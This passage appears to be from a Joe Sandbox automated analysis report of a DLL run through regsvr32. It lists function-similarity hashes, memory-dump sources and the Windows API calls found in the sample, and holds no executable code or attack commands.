                                                                                                                                                • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                                • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                                                                                                • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                                • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                                • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                                                • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                                • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3186804695-0
                                                                                                                                                • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                                • Instruction ID: 2e1c3ca0d7397628510e6c8f9747096c2113370c39df8bf855b309567eeba3b0
                                                                                                                                                • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                                • Instruction Fuzzy Hash: 3E31C122A18699C5EB44DB2AD42D3AA67A1FF84BC8F484536EA4D07796DE3CD001C320
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                                • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                                                • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                                • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                                • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                                                                                                • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                                • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                                • Instruction ID: b456e1b49498020112758906e0882963a909b4f1eceaef019be325c5d28b8920
                                                                                                                                                • Opcode Fuzzy Hash: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                                • Instruction Fuzzy Hash: E0317570629781ABC78CDF28C59591ABBE1FBD9344F806A2DF8868B350D774D445CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                                • Instruction ID: e1cdac85440212a901397aaa30fe146fec046d1320b50ea199ee65054a90651b
                                                                                                                                                • Opcode Fuzzy Hash: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                                • Instruction Fuzzy Hash: 0F317FB56187848B9388DF28C48641ABBE1FBDD30CF504B2DF8CAA6254D778D645CB4B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                                • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                                                • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                                • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                                • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                                                • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                                • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                                • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                                                • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                                • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                                • Instruction ID: cb3a07774fb09d7bec151804a9501dd67b802bcd534e5dea3a88175996b4459c
                                                                                                                                                • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                                • Instruction Fuzzy Hash: 5CB09B6570C758C54765870754145155792F7ADBD46044134AD0D53B54DD3C97408750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                                • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                                • Instruction ID: f1f4f0fd0f76d5f101b410aa9cbad8059e22e0c104d73a1874b716ce8eedb19e
                                                                                                                                                • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                                • Instruction Fuzzy Hash: F341A522A1A499C1EE64EB33D4656BC5362FF84B48F046835DB4D4B1A7CE15D845C370
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D0F5
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D111
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D139
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D142
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D158
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D161
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D177
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D180
                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D19E
                                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1A7
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1D9
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D1E8
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D240
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D260
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC672070D4,?,?,?,?,?,00007FFC67207194), ref: 00007FFC6720D279
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                • API String ID: 3085332118-232180764
                                                                                                                                                • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                                • Instruction ID: 5b309b6b8da2db68235620c9d1c426b832ad829dbaf5679fbcbd5130476ad77e
                                                                                                                                                • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                                • Instruction Fuzzy Hash: C2510960A0EB6EC5FD64DB63A8681746390BF85B88F550935DD4E037A2EF3CE585C230
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC672102F9
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC6721030D
                                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC67210410
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CompareErrorInfoLastString
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3723911898-0
                                                                                                                                                • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                                • Instruction ID: 86a2fb40965edba633244821bd666b2fdd0564cd9e58f64f96d6803bb72aedc5
                                                                                                                                                • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                                • Instruction Fuzzy Hash: FFE1CE22A1C2EACAEB309F1295642BD6792FF4479CF544A35DB5D47BC4CE3CA960C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3466867069-0
                                                                                                                                                • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                                • Instruction ID: c5a53df40a136091db50d3de0866a7c297aae233f7c93117029b513a2e5c16d0
                                                                                                                                                • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                                • Instruction Fuzzy Hash: 56716A61E0D67EC0FE69972B947D2792391BF8178CF580D3AC65E067A1DE2CE981C270
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1575098132-0
                                                                                                                                                • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                                • Instruction ID: f913d34fe6680110fcb1844ccc1ecb5f8279f448a46d4f6d9208267db7a3f9c6
                                                                                                                                                • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                                • Instruction Fuzzy Hash: C1311E61A0F5AAC5FE68EA6391B97785391BF80B8CF041936DA0E066C6DF1CF840C371
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$ErrorInfoLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 189849726-0
                                                                                                                                                • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                                • Instruction ID: 054eb8509c1adf1ef1f6ffdbfbddd9d6864259e5c56891af12047e1d0d58a477
                                                                                                                                                • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                                • Instruction Fuzzy Hash: 9AB1CE32A0D6A6C6DB20CF26A4686AD77A0FF48748F84453AEB9C87791DF3DD441C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 994105223-0
                                                                                                                                                • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                                • Instruction ID: 6803aeee69c878eda0eb1eb3293baa1020fcc36553a082fc36a24e7bc997a09b
                                                                                                                                                • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                                • Instruction Fuzzy Hash: B141A061A0D36AC5EA249B23A56C43963A2FF95B98F144838EB4E13B55CF3CE491C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                                • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                                • Instruction ID: d9d7d4e427d0f1b00f60d0fd7eab10c2855fc80a90eb850c4f4b868153049491
                                                                                                                                                • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                                • Instruction Fuzzy Hash: EC410E32A0E5AAC4EF65DE23D4687BC2391FF94B48F045835DA0D4A696DF2DA891C370
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3451773520-0
                                                                                                                                                • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                                • Instruction ID: 78bfd753ed21f32ca76bc09e2b638388291907f5fdda921f72e23f62deff1fe8
